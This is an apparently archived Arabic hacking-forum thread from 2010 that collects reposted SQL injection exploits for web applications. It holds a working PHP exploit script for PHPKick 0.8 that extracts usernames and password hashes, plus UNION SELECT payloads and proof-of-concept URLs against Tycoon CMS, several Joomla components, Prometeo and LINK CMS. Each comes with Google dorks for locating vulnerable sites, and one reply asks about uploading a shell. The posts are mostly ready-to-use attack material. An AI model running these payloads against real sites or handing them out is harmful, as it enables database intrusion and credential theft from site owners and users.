√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--

Master vbspiders · 08-09-2010, 10:03 PM

كود PHP:

 
# Exploit Title: PHPKick v0.8 statistics.php SQL Injection

# Date: August 8th, 2010

# Time: 03:45am ;(

# Author: garwga

# Version: 0.8

# Google dork : "© 2004 PHPKick.de Version 0.8"

# Category:  webapps/0day

# Code: see below

  

<?php

    echo"\n\n";

    echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";

    echo"|                                                                            |\n";

    echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";

    echo"|                                                                            |\n";

    echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";

    echo"|                                                                            |\n";

  

    echo"|Notes:This exploit works regardless of the PHP security settings            |\n";

    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";

    echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";

    echo"|      the owner of the webspace is illegal!                                 |\n";

    echo"|      I'm not responsible for any resulting damage                          |\n";

    echo"|                                                                            |\n";

    echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";

    echo"|                                                                            |\n";

    echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";

    echo"|============================================================================|\n\n\n";

  

  

if($_SERVER['argv'][1] && $_SERVER['argv'][2]){

    $host=$_SERVER['argv'][1];

    $path=$_SERVER['argv'][2];

    $spos=strpos($host, "http://");

    if(!is_int($spos)&&($spos==0)){

       $host="http://$host";

      }

    if(!$host=="http://localhost"){

       $spos=strpos($host, "http://www.");

       if (!is_int($spos)&&($spos==0)){

          $host="http://www.$host";

          }

      }

    $exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";

    echo"exploiting...\n";

    $source=file_get_contents($host.$path.$exploit);

    $username=GetBetween($source," :<br>",":");

    echo "username: $username\n";

    $hash=GetBetween($source,"<br>$username:","</td>");

    echo"hash: $hash\n";

    }

else{

    echo"\n\n";

    echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";

    echo"|                                                                            |\n";

    echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";

    echo"|                                                                            |\n";

    echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";

    echo"|                                                                            |\n";

  

    echo"|Notes:This exploit works regardless of the PHP security settings            |\n";

    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";

    echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";

    echo"|      the owner of the webspace is illegal!                                 |\n";

    echo"|      I'm not responsible for any resulting damage                          |\n";

    echo"|                                                                            |\n";

    echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";

    echo"|                                                                            |\n";

    echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";

    echo"|============================================================================|\n";

}

function GetBetween($content,$start,$end){

    $r = explode($start, $content);

    if (isset($r[1])){

        $r = explode($end, $r[1]);

        return $r[0];

    }

    return '';

}

?>

Master vbspiders · 08-09-2010, 10:05 PM

كود PHP:

  % Tycoon(CMS) Record Script Sql vulnerability

 

-------------------------------------------------------------------------------

0                             | |              | |                      | |  TM

1   _______  _ __   ___ ______| |__   __ _  ___| | _____ _ __ _ __   ___| |_

0  |_  / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|

1   / / (_) | | | |  __/      | | | | (_| | (__|   <  __/ | _| | | |  __/ |_

0  /___\___/|_| |_|\___|      |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|

1                         0xPrivate 0xSecurity 0xTeam

0       ++++++++++++++++++++++++++++++++++++++++++++++++++++

1                      A Placec Of 0days  

------------------------------------------------------------------------------

 

^Exploit Title  : Tycoon(CMS) Record Script Sql vulnerability

^Date       : 7/8/2010

^Vendor Site    : http://www.tycoon.co.kr

^MOD Version    : 1.0.9

^Author     : Silic0n (science_media017[At]yahoo.com)

^category:  : webapps/0day

^Dork       : inurl:index.php?mode=game_player

 

------------------------------------------------------------------------------

Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o ,

 Dark , XG3N , Belma(sweety), messsy , Thor ,abronsius ,Nova ,

 ConsoleFx , Exi , Beenu , R4cal , jaya ,entr0py,[]0iZy5 & All my friends .

 

My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon) , www.root-market.com ,www.Darkode.com ,r00tDefaced.com

 

----------------------------------->Exploit<----------------------------------

 

0x1: Goto http://{localhost}/record/index.php?mode=game_player&type=0&year=2010&game_id=-14 UNion Select 1,2,@@version

 

Version : (4.0.22-log)

 

------------------------------------------------------------------------------

Master vbspiders · 08-09-2010, 10:07 PM

كود PHP:

  view source

print?

     )   )            )                     (   (         (   (    (       )     )

  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /(

  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())

 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\

__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)

\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ /

 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' < 

  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\

                                        .WEB.ID

-----------------------------------------------------------------------

 Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability

-----------------------------------------------------------------------

Author      : v3n0m

Site        : http://yogyacarderlink.web.id/

Date        : August, 07-2010

Location    : Jakarta, Indonesia

Time Zone   : GMT +7:00

----------------------------------------------------------------

 

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Application : NeoRecruit

Version     : 1.4 Lower versions may also be affected

Vendor      : http://www.neojoomla.com/

Price       : 54,90 €

Google Dork : inurl:com_neorecruit

----------------------------------------------------------------

 

Xploit:

~~~~~~~

 

-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users--

 

Poc:

~~~~~~~

 

http://127.0.0.1/[path]/index.php?option=com_neorecruit&task=offer_view&id=[SQLi]

 

----------------------------------------------------------------

 

WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com

 

---------------------------[EOF]--------------------------------

KALASH3R · 08-10-2010, 03:39 PM

يعطيك العافية

بارك الله فيك

Master vbspiders · 08-11-2010, 01:32 AM

[align=center]KALASH3R
لا اريد ردود حانبية
تحياتي[/align]

PrInCe Of PeRsIa · 08-11-2010, 01:57 AM

thanxxx so much mohammad
keep ur job like this

Master vbspiders · 08-27-2010, 02:32 PM

كود PHP:

                        ****     **    ********   **********                     /**/**   /**   **//////   /////**///                      /**//**  /**  /**             /**                         /** //** /**  /*********      /**                         /**  //**/**  ////////**      /**                         /**   //****         /**      /**                         /**    //***   ********       /**                         //      ///   ////////        //

 

                          =================================                  

Prometeo (vers. 1.0.65)  -SQLi Vulnerability-                          =================================

 

-Vulnerability ID: LD3-Product: Prometeo-Vendor: Prometeo (http://www.infomedia2000.it/prometeo/)-Vulnerability Type: SQL Injection-Status: Unfixed-Risk level: High-Credit: Network Security (http://www.netw0rksecurity.net/)

 

-Vulnerability Details:User can execute arbitrary JavaScript code within the vulnerable application.An attacker can use browser to exploit this vulnerability.

 

-Google Dork: inurl:categoria.php?ID= comune

 

-Example:

http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--

 

# Netw0rkSecurity.net [2010-08-26]                 

 
Comments

Master vbspiders · 08-27-2010, 02:35 PM

كود PHP:

  ############################## ALGERIAN HAX0RZ #############################..

# Exploit Title: [title]

# Date: 24/08/2010

# Author: TopSat13

# Software Link: http://remository.com/downloads/

# Version: 1

# Tested on: [win sp3 os]

# CVE : [if exists]

####

#              oooo[ Software Information ]oooo

# Author: TopSat13

#

# Email: TopSat13@live.fr

#

# Vendor : http://remository.com/

#

# title : Joomla Component (com_remository) SQL Injection Vulnerability

#

# Dork :"inurl:index.php?option=com_remository"

#

####           oooo[ vuln & exploit & Demo ]oooo

#

# vuln: site.com/index.php?option=com_remository&Itemid=[sql]

# or

# vuln: site.com/index.php?option=c&Itemid=183&func=selectcat&cat=[sql]

#

# exploit:

#

# 0nligne demo :

http://www.site.com/portail/index.php?option=com_remository&Itemid=183&func=selectcat&cat=3'

#

#

####          oooo[ Greeeeeeeeeeeeeeeeeeetz ]oooo

#

# to : ALLAH , All my freands , all musulmens hackerz

#

############################## ALGERIAN H4X0RZ

################################..

Master vbspiders · 08-27-2010, 02:37 PM

كود PHP:

  ---------------------------------------------------------------------------------

Joomla Component Zoom Portfolio (id) Remote Sql Injection

---------------------------------------------------------------------------------

 

Author      : Chip D3 Bi0s

Group       : LatinHackTeam

Email & msn : chipdebios@gmail.com

Date        : 23 August 2010

Critical Lvl    : Moderate

Impact      : Exposure of sensitive information

Where       : From Remote

---------------------------------------------------------------------------

 

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Application : Zoom Portfolio --Joomla Portfolio Component

version     : 1.5

Price       : $20.00

Developer   : EGBZOOM

License     : GPLv2 or later           type  : Commercial

Date Added  : 21 August 2010

Download    : http://www.egbzoom.com/joomla-portfolio-component.html

 

Description     :

 

Zoom Portfolio enables you to display your portfolio in a "directory listing-like

presentation" with minimum effort.The Component has features like add category

add images,settings,add portfolio .Zoom Portfolio includes automatic thumbnail creation,

captioning, searching and more.It also includes the ability to modify and delete any

of your existing pages.

The Zoom Portfolio is an amazing example of what can be done online with your online

presence. It is directed at artists of all walks of life, it is very easy to install

and customize, and it is just simply stunning.

 

-------------------------

 

How to exploit

 

http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]

 

-------------------------

 

+++++++++++++++++++++++++++++++++++++++

[!] Produced in South America

+++++++++++++++++++++++++++++++++++++++

Master vbspiders · 08-27-2010, 02:39 PM

كود PHP:

  # Exploit Title: LINK CMS.SQL Injection Vulnerability

# Date: 2010-08-23

# Author: hacker@sr.gov.yu

# Software Link:

http://www.link-softsolutions.com/SoftLink-Content-Management-System---CMS_20_1

# Version: n/a

 

 

####################################################################

.:. Author : hacker@sr.gov.yu

.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)

.:. Home : www.evilzone.org, www.pentesting-rs.org

.:. Script : LINK CMS

.:. Bug Type : Sql Injection

.:. Risk: High

.:. Tested on : Windows & Linux

 ####################################################################

 

===[ Exploit ]===

 

.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"

parameter value.

 

http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]

 

===[ Example ]===

 

http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63

UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--

 

 

===[ Solution ]===

 

.:. Input validation of "IDStranicaPodaci" parameter should be corrected.

 

 

Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!

Pozdrav za sve iz Srbije!!! :-)))

MadaRaXP · 08-28-2010, 06:04 AM

perl langugue ?
its need Some Application Yo Run

winfil · 12-01-2010, 03:19 AM

thnk you so much homie at last i found smth'n more stable .i want to ask you if i can upload my shell when i enter the db & other question can i use ""havij whith those exploits

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
ترتيب الخطوات في حقن قواعد البيانات SQL Injection	KaLa$nikoV	SQL قواعد البيانات	127	05-03-2017 08:12 PM
جميع ادوات حقن قواعد البيانات -Sql injection- {قأبل للتحديث}	Master vbspiders	SQL قواعد البيانات	280	08-24-2015 04:10 AM
Thumbs up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injection	Black-FoG	SQL قواعد البيانات	73	03-14-2014 09:08 PM
[Style] : ¨°•√♥ كل عام وانتم بخير العيدية استايل العيد الازرق الاحترافي من سنبوك لتصميم ♥√•°¨	support	قسم ستآيلات الـ vB	0	09-18-2009 11:52 PM

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--

SQL قواعد البيانات